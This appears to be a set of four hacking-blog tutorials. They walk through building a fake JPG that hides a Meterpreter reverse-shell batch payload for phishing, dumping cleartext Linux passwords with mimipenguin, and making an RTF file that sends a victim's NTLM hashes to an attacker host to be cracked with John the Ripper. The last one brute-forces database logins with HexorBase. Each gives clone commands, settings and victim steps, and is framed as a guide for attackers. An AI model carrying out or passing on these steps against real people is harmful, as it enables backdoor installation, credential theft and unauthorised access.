Embedded Backdoor with Image using FakeImageExploiter

In this article we are introducing a newly launched hacking tool “Fake Image Exploiter”. It is design so that it becomes easier for attackers to perform phishing or social engineering attacks by generating a fake image with hidden malicious .bat/.exe file inside it.

Let’s start!

Open the terminal inside your kali Linux and type following command to download it from github.

Git clone https://github.com/r00t-3xp10it/FakeImageExploiter.git

Once it gets downloaded then opens the folder and selects the file “settings” for configuration before running the program as shown the given screenshot.

Now made some changes inside setting file as shown the screenshot:

Here you have to declare the type of payload extension you will use to hide it inside the image. You can set any exetension among these four : ps1, bat, txt, exe.  I had set PAYLOAD_EXETNSION=bat similarly set BYPASS_RH=NO  and scroll down for next configration.

In same way set these two values also as shown in screenshot then save the changes.

AUTO_PAYLOAD_BUILD=YES

AGENT_HANLER_PORT=4444

After making certain changes in setting file then open the terminal and run the program file:

Cd FakeImageExploiter

./ FakeImageExploiter.sh

Click on YES to execute framework.

Select payload to build as I had choose window/meterpreter/reverse_tcp for attack.

After then a pop up box will open which will allow choosing any jpg image so that it could hide .bat file payload inside that image.

Now select icon for your malicious image. 

Give a name to your payload which will be display to victim as file name, from screenshot you can see I had given sales.

Now it generates a link as you can observe it from highlighted part of screenshot and then send this link to victim. Now victim will download the zip file and click on the sales.jpg.

When victim will click on sales.jpg, we will get meterpreter session at the background on metasploit framework.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Dump Cleartext Password in Linux PC using MimiPenguin

Hello friends! Through this article we are introducing a new tool MINIPENUIN between us, which can utilize for fetching login of Linux system in same way as MIMIKATZ. 

A tool to dump the login password from the current linux desktop user. Adapted from the idea behind the popular Windows tool mimikatz.

Takes advantage of clear text credentials in memory by dumping the process and extracting lines that have a high probability of containing cleartext passwords. Will attempt to calculate each word’s probability by checking hashes in /etc/shadow, hashes in memory, and regex searches.

Let’s begin

Open the terminal and type following command to download it from git hub.

Cd Desktop

git clone https://github.com/huntergregal/mimipenguin.git

Ls

cd mimipenguin

Now run the bash file to catch the clear text credential

./mimipenguin.sh

From screenshot you can see I have got login credential root: toor.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Stealing Windows Credentials of Remote PC with MS Office Document

Hello! Today you will found something incredible in this article which is related to a newly lunched script named as “WORD STEAL” that can define your hacking skill more and more. This script will create a POC that will steal NTML hashes from a remote computer.

Microsoft Word has the ability to include images from remote locations. This is an undocumented feature but was found used by malware creators to include images through http for statistics. We can also include remote files to a SMB server and the victim will authenticate with his logins credentials. This is very useful during a Pentest because allows you to steal credentials without triggering any alerts and most of the security apps do not detect this.

 LET’s Broach!!!

Attacker: Kali Linux

Target: Windows 10 (Microsoft Word 2007)

First we need to download it from Git hub, open the terminal in your Kali Linux and type following command.

Git clone https://github.com/0x090x0/WordSteal.git

Now open the downloaded folder word steal where you will get a python script “main.py” give all permissions to main.py script if required.

Chmod 777 main.py

 As author has described that this script will convert an image or say .jpg into .rtf (Microsoft word file) The Rich Text Format is a proprietary document file format with published specification developed by Microsoft Corporation for cross-platform document interchange with Microsoft products.  

After then download an image and save it inside Wordsteal folder, since I have an image “1.jpg” at this moment we require to type following command which generates .rtf file that steal NTML hashes from a remote computer.

Python main.py 192.168.0.104 1.jpeg 1

Above command will generate .rtf file as you can figure out this in the given screenshot, after then send 1.rtf file to remote PC.

When victim will open 1.rtf (as Microsoft word file) in his system, on other hand attack will receive NTML hashes.

Inside word steal we have stolen credentials without triggering any alerts which you can observe in following image.

Now use password cracker tool john the ripper to crack hashes in password_netntlmv2 file or type following command

John password_netntlmv2

Cool!!! We can see victim’s credential clearly RAJ: 123 that might be further use for login.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Brute Forcing Multiple Databases using HexorBase

HexorBase is a database application designed for administering and auditing multiple database servers simultaneously from a centralized location, it is capable of performing SQL queries and bruteforce attacks against common database servers (MySQL, SQLite, Microsoft SQL Server, Oracle, PostgreSQL ). HexorBase allows packet routing through proxies or even metasploit pivoting antics to communicate with remotely inaccessible servers which are hidden within local subnets.

To run hexorbase in kali Linux  click application > database assessment > hexorbase

Another way, open the terminal and type hexorbase.

 It will open graphical interface for hexorbase as given in the screenshot. It is the collection of several database servers where you can apply brute force attack on desired server.

Now to start brute force attack, first you need to create an account. In the middle you can see administration panel here type username and password according to your wills. I had type admin: pass as username and password this will allow me to start brute force attack using hexor on desired backend server.

Now choose your database type. I have selected MY SQL for brute force attack.

Now follow few steps for brute force attack on server.

  • Type target IP: 168.1.104 under database connection.
  • Now click on user list for dictionary attack option and select a dictionary of username.
  • Repeat the above step for word list to select password list.
  • Finally click on lunch attack to start brute force attack.

Now it will try to match the combination of username and password on target IP. After sometime when the process is completed 100% you will get matched combination as result. You can perceive from screenshot that I have got username and password combination as msfadmin:msfadmin for MYSQL server.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Related Posts Plugin for WordPress, Blogger...